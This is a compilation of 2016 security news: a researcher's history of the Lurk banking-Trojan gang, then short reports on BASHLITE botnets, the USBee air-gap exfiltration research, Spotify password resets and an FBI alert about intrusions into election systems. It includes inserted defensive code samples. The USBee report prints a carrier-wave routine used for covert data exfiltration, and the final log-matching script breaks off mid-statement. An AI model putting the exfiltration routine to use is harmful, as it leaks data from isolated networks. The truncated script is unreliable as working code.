When we first encountered Lurk, in 2011, it was a nameless Trojan. It all started when we became aware of a number of incidents at several Russian banks that had resulted in the theft of large sums of money from customers. To steal the money, the unknown criminals used a hidden malicious program that was able to interact automatically with the financial institution’s remote banking service (RBS) software, replacing bank details in payment orders generated by an accountant at the attacked organization, or even generating such orders by itself.

In 2016, it is hard to imagine banking software that does not demand some form of additional authentication, but things were different back in 2011. In most cases, the attackers only had to infect the computer on which the RBS software was installed in order to start stealing the cash. Russia’s banking system, like those of many other countries, was unprepared for such attacks, and cybercriminals were quick to exploit the security gap.

We participated in the investigation of several incidents involving the nameless malware, and sent samples to our malware analysts. They created a signature to see if any other infections involving it had been registered, and discovered something very unusual: our internal malware naming system insisted that what we were looking at was a Trojan that could be used for many things (spamming, for example) but not stealing money.

Our detection systems suggest that a program with a certain set of functions can sometimes be mistaken for something completely different. In the case of this particular program the cause was slightly different: an investigation revealed that it had been detected by a “common” signature because it was doing nothing that could lead the system to include it in any specific group, for example, that of banking Trojans.

Whatever the reason, the fact remained that the malicious program was used for the theft of money.

So we decided to take a closer look at the malware. The first attempts to understand how the program worked gave our analysts nothing. Regardless of whether it was launched on a virtual or a real machine, it behaved in the same way: it didn’t do anything. This is how the program, and later the group behind it, got its name. To “lurk” means to hide, generally with the intention of ambush.

We were soon able to help investigate another incident involving Lurk. This time we got a chance to explore the image of the attacked computer. There, in addition to the familiar malicious program, we found a .dll file with which the main executable file could interact. This was our first piece of evidence that Lurk had a modular structure.

Later discoveries suggest that, in 2011, Lurk was still at an early stage of development. It was formed of just two components, a number that would grow considerably over the coming years.

The additional file we uncovered did little to clarify the nature of Lurk. It was clear that it was a Trojan targeting RBS and that it was used in a relatively small number of incidents. In 2011, attacks on such systems were starting to grow in popularity. Other, similar, programs were already known about, the earliest detected as far back as 2006, with new malware appearing regularly since then. These included ZeuS, SpyEye and Carberp, among others. In this series, Lurk represented yet another dangerous piece of malware.

It was extremely difficult to make Lurk work in a lab environment. New versions of the program appeared only rarely, so we had few opportunities to investigate new incidents involving Lurk. A combination of these factors influenced our decision to postpone our active investigation into this program and turn our attention to more urgent tasks.

A change of leader

For about a year after we first met Lurk, we heard little about it. It later turned out that the incidents involving this malicious program were buried in the huge amount of similar incidents involving other malware. In May 2011, the source code of ZeuS had been published on the Web and this resulted in the emergence of many program modifications developed by small groups of cybercriminals.

In addition to ZeuS, there were a number of other unique financial malware programs. In Russia, there were several relatively large cybercriminal groups engaged in financial theft via attacks on RBS. Carberp was the most active among them. At the end of March 2012, the majority of its members were arrested by the police. This event significantly affected the Russian cybercriminal world as the gang had stolen hundreds of millions of rubles during a few years of activity, and was considered a “leader” among cybercriminals. However, by the time of the arrests, Carberp’s reputation as a major player was already waning. There was a new challenger for the crown.

A few weeks before the arrests, the sites of a number of major Russian media, such as the agency “RIA Novosti”, Gazeta.ru and others, had been subjected to a watering hole attack. The unknown cybercriminals behind this attack distributed their malware by exploiting a vulnerability in the websites’ banner exchange system. A visitor to the site would be redirected to a fraudulent page containing a Java exploit. Successful exploitation of the vulnerability initiated the launch of a malicious program whose main function was collecting information on the attacked computer, sending it to a malicious server, and in some cases receiving and installing an extra load from the server.


The code on the main page of RIA.ru that is used to download additional content from AdFox.ru

From a technical perspective, the malicious program was unusual. Unlike most other malware, it left no traces on the hard drive of the attacked system and worked only in the RAM of the machine. This approach is not often used in malware, primarily because the resulting infection is “short-lived”: the malware exists in the system only until the computer is restarted, at which point the process of infection needs to be started anew. But, in the case of these attacks, the secret “bodiless” malicious program did not have to gain a foothold in the victim’s system. Its primary job was to explore; its secondary role was to download and install additional malware. Another fascinating detail was the fact that the malware was only downloaded in a small number of cases, when the victim computer turned out to be “interesting”.


Part of the Lurk code responsible for downloading additional modules

Analysis of the bodiless malicious program showed that it was “interested” in computers with remote banking software installed. More specifically, RBS software created by Russian developers. Much later we learned that this unnamed, bodiless module was a mini, one of the malicious programs which used Lurk. But at the time we were not sure whether the Lurk we had known since 2011, and the Lurk discovered in 2012, were created by the same people. We had two hypotheses: either Lurk was a program written for sale, and both the 2011 and 2012 versions were the result of the activity of two different groups, which had each bought the program from the author; or the 2012 version was a modification of the previously known Trojan.

The second hypothesis turned out to be correct.

Invisible war with banking software

A small digression. Remote banking systems consist of two main parts: the bank and the client. The client part is a small program that allows the user (usually an accountant) to remotely manage their organization’s accounts. There are only a few developers of such software in Russia, so any Russian organization that uses RBS relies on software developed by one of these companies. For cybercriminal groups specializing in attacks on RBS, this limited range of options plays straight into their hands.

In April 2013, a year after we found the “bodiless” Lurk module, the Russian cybercriminal underground exploited several families of malicious software that specialized in attacks on banking software. Almost all operated in a similar way: during the exploration stage they found out whether the attacked computer had the necessary banking software installed. If it did, the malware downloaded additional modules, including ones allowing for the automatic creation of unauthorized payment orders, changing details in legal payment orders, etc. This level of automation became possible because the cybercriminals had thoroughly studied how the banking software operated and “tailored” their malicious software modules to a specific banking solution.

The people behind the creation and distribution of Lurk had done exactly the same: studying the client component of the banking software and modifying their malware accordingly. In fact, they created an illegal add-on to the legal RBS product.

Through the information exchanges used by people in the security industry, we learned that several Russian banks were struggling with malicious programs created specifically to attack a particular type of legal banking software. Some of them were having to release weekly patches to customers. These updates would fix the immediate security problems, but the mysterious hackers “on the other side” would quickly release a new version of malware that bypassed the upgraded protection created by the authors of the banking programs.

It should be understood that this type of work – reverse-engineering a professional banking product – cannot easily be undertaken by an amateur hacker. In addition, the task is tedious and time-consuming and not the kind to be performed with great enthusiasm. It would need a team of specialists. But who in their right mind would openly take up illegal work, and who might have the money to finance such activities? In trying to answer these questions, we eventually came to the conclusion that every version of Lurk probably had an organized group of cybersecurity specialists behind it.

The relative lull of 2011-2012 was followed by a steady increase in notifications of Lurk-based incidents resulting in the theft of money. Due to the fact that affected organizations turned to us for help, we were able to collect ever more information about the malware. By the end of 2013, the information obtained from studying hard drive images of attacked computers as well as data available from public sources, enabled us to build a rough picture of a group of Internet users who appeared to be associated with Lurk.

This was not an easy task. The people behind Lurk were pretty good at anonymizing their activity on the network. For example, they were actively using encryption in everyday communication, as well as false data for domain registration, services for anonymous registration, etc. In other words, it was not as easy as simply looking someone up on “Vkontakte” or Facebook using the name from Whois, which can happen with other, less professional groups of cybercriminals, such as Koobface. The Lurk gang did not make such blunders. Yet mistakes, seemingly insignificant and rare, still occurred. And when they did, we caught them.

Not wishing to give away free lessons in how to run a conspiracy, I will not provide examples of these mistakes, but their analysis allowed us to build a pretty clear picture of the key characteristics of the gang. We realized that we were dealing with a group of about 15 people (although by the time it was shut down, the number of “regular” members had risen to 40). This team provided the so-called “full cycle” of malware development, delivery and monetization – rather like a small, software development company. At that time the “company” had two key “products”: the malicious program, Lurk, and a huge botnet of computers infected with it. The malicious program had its own team of developers, responsible for developing new functions, searching for ways to “interact” with RBS systems, providing stable performance and fulfilling other tasks. They were supported by a team of testers who checked the program performance in different environments. The botnet also had its own team (administrators, operators, money flow manager, and other partners working with the bots via the administration panel) who ensured the operation of the command and control (C&C) servers and protected them from detection and interception.

Developing and maintaining this class of malicious software requires professionals and the leaders of the group hunted for them on job search sites. Examples of such vacancies are covered in my article about Russian financial cybercrime. The description of the vacancy did not mention the illegality of the work on offer. At the interview, the “employer” would question candidates about their moral principles: applicants were told what kind of work they would be expected to do, and why. Those who agreed got in.


A fraudster has advertised a job vacancy for java / flash specialists on a popular Ukrainian website. The job requirements include a good level of programming skills in Java, Flash, knowledge of JVM / AVM specifications, and others. The organizer offers remote work and full employment with a salary of $2,500.

So, every morning, from Monday to Friday, people in different parts of Russia and Ukraine sat down in front of their computer and started to “work”. The programmers “tuned” the functions of malware modifications, after which the testers carried out the necessary tests on the quality of the new product. Then the team responsible for the botnet and for the operation of the malware modules and components uploaded the new version onto the command server, and the malicious software on botnet computers was automatically updated. They also studied information sent from infected computers to find out whether they had access to RBS, how much money was deposited in clients’ accounts, etc.

The money flow manager, responsible for transferring the stolen money into the accounts of money mules, would press the button on the botnet control panel and send hundreds of thousands of rubles to accounts that the “drop project” managers had prepared in advance. In many cases they didn’t even need to press the button: the malicious program substituted the details of the payment order generated by the accountant, and the money went directly to the accounts of the cybercriminals and on to the bank cards of the money mules, who cashed it via ATMs, handed it over to the money mule manager who, in turn, delivered it to the head of the organization. The head would then allocate the money according to the needs of the organization: paying a “salary” to the employees and a share to associates, funding the maintenance of the expensive network infrastructure, and of course, satisfying their own needs. This cycle was repeated several times.


Each member of the typical criminal group has their own responsibilities.

These were the golden years for Lurk. The shortcomings in RBS transaction protection meant that stealing money from a victim organization through an accountant’s infected machine did not require any special skills and could even be automated. But all “good things” must come to an end.

The end of “auto money flow” and the beginning of hard times

The explosive growth of thefts committed by Lurk and other cybercriminal groups forced banks, their IT security teams and banking software developers to respond.

First of all, the developers of RBS software blocked public access to their products. Before the appearance of financial cybercriminal gangs, any user could download a demo version of the program from the manufacturer’s website. Attackers used this to study the features of banking software in order to create ever more tailored malicious programs for it. Finally, after many months of “invisible war” with cybercriminals, the majority of RBS software vendors succeeded in perfecting the security of their products.

At the same time, the banks started to implement dedicated technologies to counter the so-called “auto money flow”, the procedure which allowed the attackers to use malware to modify the payment order and steal money automatically.
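The article does not say which technologies the banks deployed, so the following is an added, simplified model of one widely used idea rather than a description of any bank’s or RBS vendor’s system: a confirmation code sent over an out-of-band channel is bound to the payment details the bank actually received. The message the customer sees names the beneficiary and the amount, so a substituted order is visible before it is confirmed, and because the code is an HMAC over those fields, a code issued for one order cannot be replayed to approve a different one. All names, account numbers, the key and the nonce are constructed for the example.

```python
import hashlib
import hmac

# Constructed demo key shared by the bank and its code-issuing back end;
# not a real secret.
DEMO_KEY = b"constructed-demo-key-not-a-real-secret"

# The order the accountant prepared (constructed).
LEGIT_ORDER = {
    "beneficiary_name": "Supplier LLC",
    "beneficiary_account": "40702810000000000001",
    "amount": "350000.00",
    "currency": "RUB",
}

# The same order after a malicious substitution of the beneficiary (constructed).
TAMPERED_ORDER = dict(LEGIT_ORDER, beneficiary_name="Mule Trading",
                      beneficiary_account="40817810000000000099")


def order_fingerprint(order):
    """Canonical encoding of the fields the confirmation code must protect."""
    fields = (
        order["beneficiary_account"],
        order["beneficiary_name"],
        order["amount"],
        order["currency"],
    )
    return "|".join(fields).encode("utf-8")


def issue_confirmation(order, key, nonce):
    """Bank side: derive a 6-digit code from the order details and a
    per-transaction nonce, and build the out-of-band message the customer
    sees. Returns (message, code)."""
    mac = hmac.new(key, nonce + order_fingerprint(order), hashlib.sha256).digest()
    code = "%06d" % (int.from_bytes(mac[:4], "big") % 1_000_000)
    message = (
        "Confirm payment of {amount} {currency} to {beneficiary_name} "
        "(account {beneficiary_account})? Code: {code}"
    ).format(code=code, **order)
    return message, code


def verify_confirmation(order, key, nonce, code):
    """Bank side: recompute the code for the order about to be executed and
    compare in constant time. A code issued for different details fails."""
    _, expected = issue_confirmation(order, key, nonce)
    return hmac.compare_digest(expected, code)


if __name__ == "__main__":
    nonce = b"constructed-nonce-000001"
    message, code = issue_confirmation(LEGIT_ORDER, DEMO_KEY, nonce)
    print(message)
    print("legit order verifies:", verify_confirmation(LEGIT_ORDER, DEMO_KEY, nonce, code))
    print("tampered order verifies:", verify_confirmation(TAMPERED_ORDER, DEMO_KEY, nonce, code))
```

This binding is only as strong as the out-of-band channel: if the confirmation message reaches the attacker instead of the customer, the details shown in it no longer help, which is why the SIM card re-issue scheme described later in this article was attractive and why banks began tracking changes to the customer’s SIM.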

By the end of 2013, we had thoroughly explored the activity of Lurk and collected considerable information about the malware. At our farm of bots, we could finally launch a consistently functioning malicious script, which allowed us to learn about all the modifications cybercriminals had introduced into the latest versions of the program. Our team of analysts had also made progress: by the year’s end we had a clear insight into how the malware worked, what it comprised and what optional modules it had in its arsenal.

Most of this information came from the analysis of incidents caused by Lurk-based attacks. We were simultaneously providing technical consultancy to the law enforcement agencies investigating the activities of this gang.

It was clear that the cybercriminals were trying to counteract the changes introduced in banking and IT security. For example, once the banking software vendors stopped providing demo versions of their programs for public access, the members of the criminal group established a shell company to receive directly any updated versions of the RBS software.

Thefts declined as a result of improvements in the security of banking software, and the “auto money flow” became less effective. As far as we can judge from the data we have, in 2014 the criminal group behind Lurk seriously reduced its activity and “lived from hand to mouth”, attacking anyone they could, including ordinary users. Even if an attack could bring in no more than a few tens of thousands of rubles, they would still stoop to it.

In our opinion, this was caused by economic factors: by that time, the criminal group had an extensive and extremely costly network infrastructure, so, in addition to employees’ salaries, it was necessary to pay for renting servers, VPN and other technical tools. Our estimates suggest that the network infrastructure alone cost the Lurk managers tens of thousands of dollars per month.

Attempts to come back

In addition to increasing the number of “minor” attacks, the cybercriminals were trying to solve their cash flow problem by “diversifying” the business and expanding their field of activity. This included developing, maintaining and renting the Angler exploit pack (also known as XXX). Initially, this was used mainly to deliver Lurk to victims’ computers. But as the number of successful attacks started to decline, the owners began to offer smaller groups paid access to the tools.

By the way, judging by what we saw on Russian underground forums for cybercriminals, the Lurk gang had an almost legendary status. Even though many small and medium-sized groups were willing to “work” with them, they always preferred to work by themselves. So when Lurk provided other cybercriminals with access to Angler, the exploit pack became especially popular – a “product” from the top underground authority did not need advertising. In addition, the exploit pack was actually very effective, delivering a very high percentage of successful vulnerability exploitations. It didn’t take long for it to become one of the key tools on the criminal2criminal market.

As for extending the field of activity, the Lurk gang decided to focus on the customers of major Russian banks and the banks themselves, whereas previously they had chosen smaller targets.

In the second half of 2014, we spotted familiar pseudonyms of Internet users on underground forums inviting specialists to cooperate on document fraud. Early the following year, several Russian cities were swamped with announcements about fraudsters who used fake letters of attorney to re-issue SIM cards without their owners being aware of it.

The purpose of this activity was to gain access to one-time passwords sent by the bank to the user so that they could confirm their financial transaction in the online or remote banking system. The attackers exploited the fact that, in remote areas, mobile operators did not always carefully check the authenticity of the documents submitted and released new SIM cards at the request of cybercriminals. Lurk would infect a computer, collect its owner’s personal data, generate a fake letter of attorney with the help of “partners” from forums and then request a new SIM card from the network operator.

Once the cybercriminals received a new SIM card, they immediately withdrew all the money from the victim’s account and disappeared.

Although initially this scheme yielded good returns, this didn’t last long, since by then many banks had already implemented protection mechanisms to track changes in the unique SIM card number. In addition, the SIM card-based campaign forced some members of the group and their partners out into the open and this helped law enforcement agencies to find and identify suspects.

Alongside the attempts to “diversify” the business and find new cracks in the defenses of financial businesses, Lurk continued to regularly perform “minor thefts” using the proven method of auto money flow. However, the cybercriminals were already planning to earn their main money elsewhere.

New “specialists”

In February 2015, Kaspersky Lab’s Global Research and Analysis Team (GReAT) released its research into the Carbanak campaign targeting financial institutions. Carbanak’s key feature, which distinguished it from “classical” financial cybercriminals, was the participation of professionals in the Carbanak team, providing deep knowledge of the target bank’s IT infrastructure, its daily routine and the employees who had access to the software used to conduct financial transactions. Before any attack, Carbanak carefully studied the target, searched for weak points and then, at a certain moment in time, committed the theft in no more than a few hours. As it turned out, Carbanak was not the only group applying this method of attack. In 2015, the Lurk team hired similar experts.


How the Carbanak group operated.

We realized this when we found incidents that resembled Carbanak in style, but did not use any of its tools. This was Lurk. The Lurk malware was used as a reliable “back door” to the infrastructure of the attacked organization rather than as a tool to steal money. Although the functionality that had previously allowed for the near-automatic theft of millions no longer worked, in terms of its secrecy Lurk was still an extremely dangerous and professionally developed piece of malware.

However, despite its attempts to develop new types of attacks, Lurk’s days were numbered. Thefts continued until the spring of 2016. But, either because of an unshakable confidence in their own impunity or because of apathy, day-by-day the cybercriminals were paying less attention to the anonymity of their actions. They became especially careless when cashing money: according to our incident analysis, during the last stage of their activity, the cybercriminals used just a few shell companies to deposit the stolen money. But none of that mattered any more as both we and the police had collected enough material to arrest suspected group members, which happened early in June this year.

No one on the Internet knows you are a cybercriminal?

My personal experience of the Lurk investigation made me think that the members of this group were convinced they would never be caught. They had grounds to be that presumptuous: they were very thorough in concealing the traces of their illegal activity, and generally tried to plan the details of their actions with care. However, like all people, they made mistakes. These errors accumulated over the years and eventually made it possible to put a stop to their activity. In other words, although it is easier to hide evidence on the Internet, some traces cannot be hidden, and eventually a professional team of investigators will find a way to read and understand them.

Lurk is neither the first nor the last example to prove this. The infamous banking Trojan SpyEye was used to steal money between 2009 and 2011. Its alleged creator was arrested in 2013 and convicted in 2014.

The first attacks involving the banking Trojan Carberp began in 2010; the members of the group suspected of creating and distributing this Trojan were arrested in 2012 and convicted in 2014. The list goes on.

The history of these and other cybercriminal groups spans the time when everyone (and members of the groups in particular) believed that they were invulnerable and the police could do nothing. The results have proved them wrong.

Unfortunately, Lurk is not the last group of cybercriminals attacking companies for financial gain. We know about some other groups targeting organizations in Russia and abroad. For these reasons, we recommend that all organizations do the following:

If your organization was attacked by hackers, immediately call the police and involve experts in digital forensics. The earlier you apply to the police, the more evidence the forensic experts will be able to collect, and the more information the law enforcement officers will have to catch the criminals.
Apply strict IT security policies on terminals from which financial transactions are made and for employees working with them.
Teach all employees who have access to the corporate network the rules of safe online behavior.
Compliance with these rules will not completely eliminate the risk of financial attacks but will make it harder for fraudsters and significantly increase the probability of their making a mistake while trying to overcome these difficulties. And this will help law enforcement agencies and IT security experts in their work.

P.S.: why does it take so long?

Law enforcement agencies and IT security experts are often accused of inactivity, allowing hackers to remain at large and evade punishment despite the enormous damage caused to the victims.

The story of Lurk proves the opposite. In addition, it gives some idea of the amount of work that has to be done to obtain enough evidence to arrest and prosecute suspects. Unfortunately, the rules of the “game” are not the same for all participants: the Lurk group used a professional approach to organizing a cybercriminal enterprise, but, for obvious reasons, did not find it necessary to abide by the law. As we work with law enforcement, we must respect the law. This can be a long process, primarily because of the large number of “paper” procedures and restrictions that the law imposes on the types of information we as a commercial organization can work with.

Our cooperation with law enforcement in investigating the activity of this group can be described as a multi-stage data exchange. We provided the intermediate results of our work to the police officers; they studied them to understand if the results of our investigation matched the results of their research. Then we got back our data “enriched” with the information from the law enforcement agencies. Of course, it was not all the information they could find; but it was the part which, by law, we had the right to work with. This process was repeated many times until we finally got a complete picture of Lurk activity. However, that was not the end of the case.

A large part of our work with law enforcement agencies was devoted to “translating” the information we could get from “technical” into “legal” language. This ensured that the results of our investigation could be described in such a way that they were clear to the judge. This is a complicated and laborious process, but it is the only way to bring to justice the perpetrators of cybercrimes.

BASHLITE botnets peaked at 1 million Internet of Things devices
1.9.2016 securityaffairs BotNet

A joint research conducted by Level 3 Communications and Flashpoint allowed the identification of a million devices infected by the BASHLITE malware.
Do you remember the BASHLITE malware? It was a strain of malware (also known as Lizkebab, Torlus and Gafgyt) detected by experts at Trend Micro shortly after the public disclosure of the ShellShock bug.

The BASHLITE malware includes the code of the ShellShock exploit and it had been used by threat actors in the wild to run distributed denial-of-service (DDoS) attacks.

Because it could run on multiple Linux architectures, crooks used it to target Internet of Things devices.

In June, experts from the security firm Sucuri spotted a botnet composed of tens of thousands of CCTV devices that had been used by crooks to launch DDoS attacks against websites.

The BASHLITE source code was leaked online in early 2015; since then, malware developers have used it to create their own variants.

Now experts from Level 3 and Flashpoint confirmed the overall number of devices infected by the BASHLITE malware is more than 1 million.

The number includes compromised devices belonging to several botnets. According to the experts, almost every infected device is a digital video recorder (DVR) or camera (95%); the remainder is composed of routers (4%) and Linux servers (1%).

“Of the identifiable devices participating in these botnets, almost 96 percent were IoT devices (of which 95 percent were cameras and DVRs), roughly 4 percent were home routers and less than 1 percent were compromised Linux servers. This represents a drastic shift in the composition of botnets compared to the compromised server- and home router-based DDoS botnets we’ve seen in the past.” states a blog post published by Level 3 firm.

The researchers have been tracking more than 200 C&C servers worldwide used by the BASHLITE botnets. Fortunately, the IP addresses of the C&C servers were found hardcoded in the malware samples detected in the wild, which made it easy for experts to shut them down.

The researchers provided interesting details about the Global Distribution of the gafgyt Bots, the vast majority of infected devices are located in Brazil, Taiwan and Colombia.

“Of the bots we’ve observed participating in attacks, peaking at more than 1 million devices, a large percentage are located in Taiwan, Brazil and Colombia. A large majority of these bots were using white-labeled DVRs generically described as “H.264 DVRs” and DVRs manufactured by the company Dahua Technology.” continues the post. “We have contacted Dahua Technology to make them aware of this issue. Our investigation shows more than one million of these two types of devices are accessible on the internet, providing a large pool of potential bots.”


It is quite easy for hackers to compromise DVRs that are affected by multiple critical vulnerabilities. In many cases, the same flawed software is used by multiple vendors for their devices.

“Most of these devices run some flavor of embedded Linux. When combined with the bandwidth required to stream video, they provide a potent class of DDoS bots,” continues the post.

According to the experts, crooks behind the botnets have used some of the C&C servers to launch more than 100 attacks per day.

“Most attacks are short-lived, with the median duration just over 2 minutes, and 75 percent of attacks shorter than 5 minutes.”

“The use of IoT devices in botnets is not new, but as they become more common, we expect these types of botnets to increase in number and power,” Level 3 said in a blog post. “The security of IoT devices poses a significant threat. Vendors of these devices must work to improve their security to combat this growing threat. ”

USBee exfiltrates data from air-gapped networks via electromagnetic emission from USB

1.9.2016 securityaffairs Virus

A group of Israeli researchers has devised a new technique dubbed USBee to hack air-gapped networks and exfiltrate information.
Mordechai Guri, head of R&D at Ben-Gurion’s Cyber Security Center and the chief scientist officer at Morphisec Endpoint Security, and his team have devised a new technique dubbed USBee to hack air-gapped networks and exfiltrate information.

This time, the Israeli researchers exploited a covert channel via electromagnetic emission from USB. The USBee technique leverages USB connectors implanted with RF transmitters to steal sensitive data.

In this scenario, the USBee application is installed on a compromised computer. The attacker exploits a USB thumb drive already connected to the computer and establishes a short-range RF transmission modulated with data. On the other end of the communication, the transmitted data is received by a nearby receiver and decoded.


“In recent years researchers have demonstrated how attackers could use USB connectors implanted with RF transmitters to exfiltrate data from secure, and even air-gapped, computers (e.g., COTTONMOUTH in the leaked NSA ANT catalog). Such methods require a hardware modification of the USB plug or device, in which a dedicated RF transmitter is embedded.” reads the introduction to the paper published by the experts. “In this paper we present USBee, a software that can utilize an unmodified USB device connected to a computer as a RF transmitter. We demonstrate how a software can intentionally generate controlled electromagnetic emissions from the data bus of a USB connector. We also show that the emitted RF signals can be controlled and modulated with arbitrary binary data. We implement a prototype of USBee, and discuss its design and implementation details including signal generation and modulation. We evaluate the transmitter by building a receiver and demodulator using GNU Radio. Our evaluation shows that USBee can be used for transmitting binary data to a nearby receiver at a bandwidth of 20 to 80 BPS (bytes per second).”

The researchers discovered that the transmission of a sequence of ‘0’ bits to a USB port generates a detectable emission between 240 MHz and 480 MHz. The researchers exploited this mechanism by sending data from the compromised computer to a USB device in order to generate controllable EMR that can carry modulated data. The researchers used a nearby RF receiver to receive the EMR and decode the information.

Guri and his team were able to exfiltrate 80 bytes per second using this technique, a transmission speed that could allow an attacker to send out a 4,096-bit crypto key in less than 10 seconds, a notable rate for hacking air-gapped networks when compared with other covert-channel techniques.

The experts explained that it is possible to create a basic carrier wave using this algorithm:

#include <stdint.h>

typedef uint32_t u32;

/* Fills buf with size*8 words whose low bit alternates between 0 and 1
   at a rate derived from freq, so that writing the pattern to the USB
   device toggles the data bus at the requested carrier frequency. */
inline static void fill_buffer_freq(u32 *buf, int size, double freq)
{
    int i = 0;
    u32 x = 0;
    /* t decides how many loop iterations make up half a period of the carrier */
    double t = freq / 4800 * 2;
    for (i = 0, x = 0x00000000; i < size * 8; i++)
    {
        x = x << 1;              /* shift the running pattern left by one bit */
        if ((int)(i * t) % 2 == 0)
            x++;                 /* set the new low bit during "even" half-periods */
        *(buf++) = x;            /* emit the current word into the output buffer */
    }
}
The transmission starts when the application writes the byte pattern generated by fill_buffer_freq to an arbitrary data block on the USB device; the application only requires permission to create a file on the device.

“The actual data transmission is done by writing the byte pattern generated by fill_buffer_freq to an arbitrary data block or stream in the USB device. For our purposes, we used a temporary file within the USB thumb drive’s file system. The transmission process doesn’t require special privileges (e.g., root or admin). It only requires permission to create a file on the removable device.” reads the paper.

The researchers also published a video PoC of the attack that shows how the data is exfiltrated by a laptop with a $30 radio antenna from around 15 feet away.

Spotify resets users’ passwords due to data breaches suffered by other firms

1.9.2016 securityaffairs Hacking

In response to the numerous data breaches suffered by other services, the music streaming service Spotify forced a password reset for a number of users.
In recent months, numerous IT companies have suffered major data breaches, including Dropbox, LinkedIn, MySpace, VK.com, and Tumblr. The criminal underground is flooded with login credentials from these services, offered for sale by hackers.

These credentials could be used by hackers to target other online services and take over users’ accounts. This is possible because of users’ bad habit of sharing the same usernames and passwords across different web services.


In response to this remarkable string of data breaches, the music streaming service Spotify decided to force a password reset for a number of users. The company clarified that the measure was taken in response to the incidents at other firms and is not related to any problem in its own systems.


“To protect your Spotify account, we’ve reset your password. This is because we believe it may have been compromised during a leak on another service with which you use the same password.” reads a message sent by email to users on Wednesday.

“Don’t worry! This is purely a preventative security measure. Nobody has accessed your Spotify account, and your data is secure,”

Spotify allows users to easily create a new password by simply clicking on a link.

In April, hundreds of Spotify account credentials appeared online on the website Pastebin; the information included emails, usernames, passwords, account type and other details.

The popular Swedish streaming service denied any data breach and confirmed that its systems weren’t compromised by hackers. The company confirmed that it “has not been hacked” and its “user records are secure.”

“Spotify has not been hacked and our user records are secure. We monitor Pastebin and other sites regularly. When we find Spotify credentials, we first verify that they are authentic, and if they are, we immediately notify affected users to change their passwords.” states Spotify.

According to TechCrunch, the company’s security team proactively resets compromised passwords; meanwhile, a number of users have also reported problems with their accounts.

FBI flash alert says foreign hackers compromised state election systems

31.8.2016 securityaffairs Hacking

The FBI issued a “flash” alert to election officials across the country confirming that foreign hackers have compromised state election systems in two states.
The FBI confirmed that foreign hackers have penetrated state election systems; federal experts have uncovered evidence of the intrusions. The hackers penetrated the databases of two state election systems in recent weeks. In response, the FBI issued a “flash” alert to election officials across the country inviting them to adopt security measures to protect their computer systems.

“The FBI warning, contained in a “flash” alert from the FBI’s Cyber Division, a copy of which was obtained by Yahoo News, comes amid heightened concerns among U.S. intelligence officials about the possibility of cyberintrusions, potentially by Russian state-sponsored hackers, aimed at disrupting the November elections.” reported Yahoo News that obtained a copy of the “flash” alert.

The alert does not provide details about the states that suffered the attacks, but according to Yahoo News, sources familiar with the document say it refers to voter registration databases in Arizona and Illinois.

US authorities fear possible cyber attacks launched by nation-state actors such as Russia that could have serious consequences for the result of the next Presidential Election.

The Homeland Security Secretary Jeh Johnson had a conference call with state election officials on Aug. 15 to offer all the necessary support to secure state election systems.

The DHS will provide cybersecurity experts to scan the voting systems searching for vulnerabilities that could be exploited by hackers.

“The government is offering to help states protect the Nov. 8 U.S. election from hacking or other tampering, in the face of allegations by Republican Party presidential candidate Donald Trump that the system is open to fraud.” reported Reuters.

“Homeland Security Secretary Jeh Johnson told state officials in a phone call on Monday that federal cyber security experts could scan for vulnerabilities in voting systems and provide other resources to help protect against infiltration, his office said in a statement.”

Back to the FBI flash alert, titled “Targeting Activity Against State Board of Election Systems,” it was labeled as restricted for “NEED TO KNOW recipients.”

FBI alert state election systems

The warning confirms that the bureau is investigating recent cyber intrusions against two state election websites that led to the exfiltration of voter registration data.

The FBI alert contains technical details about the attacks, including the IP addresses involved in both attacks.

“The FBI is requesting that states contact their Board of Elections and determine if any similar activity to their logs, both inbound and outbound, has been detected,” the alert reads. “Attempts should not be made to touch or ping the IP addresses directly.”
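The check the alert asks for, matching logs against the listed addresses in both directions without ever contacting them, looks like the following. This is an added example, not code from the article or from the FBI alert. The alert’s real indicators are not on the page, so the watchlist holds placeholder addresses from the RFC 5737 documentation ranges; the log lines and the key=value log format are constructed, and the 1 MB outbound threshold used to rank hits is an assumption.

```python
import ipaddress
import re
from collections import defaultdict

# Placeholder indicators (RFC 5737 documentation addresses), NOT the alert's real IPs.
WATCHLIST = {
    ipaddress.ip_address("203.0.113.10"),
    ipaddress.ip_address("198.51.100.77"),
}

# Constructed sample lines in a simple key=value firewall/proxy format.
SAMPLE_LOG = """\
2016-07-12T03:14:07Z action=allow src=203.0.113.10 dst=10.20.0.5 dport=443 bytes=81203
2016-07-12T03:15:41Z action=allow src=10.20.0.5 dst=203.0.113.10 dport=22 bytes=5120000
2016-07-12T09:02:00Z action=allow src=192.0.2.44 dst=10.20.0.8 dport=80 bytes=3300
2016-07-13T22:45:19Z action=deny src=198.51.100.77 dst=10.20.0.8 dport=3306 bytes=0
2016-07-13T22:46:03Z action=allow src=10.20.0.8 dst=198.51.100.77 dport=443 bytes=20971520
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+action=(?P<action>\w+)\s+src=(?P<src>\S+)\s+dst=(?P<dst>\S+)"
    r"\s+dport=(?P<dport>\d+)\s+bytes=(?P<bytes>\d+)$"
)


def parse_line(line):
    """Parse one log line into a dict; return None for lines in an unknown format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["src"] = ipaddress.ip_address(rec["src"])
    rec["dst"] = ipaddress.ip_address(rec["dst"])
    rec["dport"] = int(rec["dport"])
    rec["bytes"] = int(rec["bytes"])
    return rec


def match_watchlist(log_text, watchlist=WATCHLIST):
    """Return hits keyed by watchlist IP: counts per direction plus outbound byte volume.

    Outbound volume matters because the alert concerns exfiltration of voter data:
    an internal host pushing a large allowed transfer to a listed address is the
    strongest signal, while a denied inbound probe is a weaker one.
    """
    hits = defaultdict(lambda: {"inbound": 0, "outbound": 0, "outbound_bytes": 0})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["src"] in watchlist:                 # inbound: listed address is the source
            hits[str(rec["src"])]["inbound"] += 1
        if rec["dst"] in watchlist:                 # outbound: listed address is the destination
            h = hits[str(rec["dst"])]
            h["outbound"] += 1
            if rec["action"] == "allow":
                h["outbound_bytes"] += rec["bytes"]
    return dict(hits)


def exfil_candidates(hits, threshold_bytes=1_000_000):
    """Listed IPs that received more than threshold_bytes from inside: review these first."""
    return sorted(ip for ip, h in hits.items() if h["outbound_bytes"] > threshold_bytes)


if __name__ == "__main__":
    result = match_watchlist(SAMPLE_LOG)
    for ip, h in sorted(result.items()):
        print(f"{ip}: inbound={h['inbound']} outbound={h['outbound']} "
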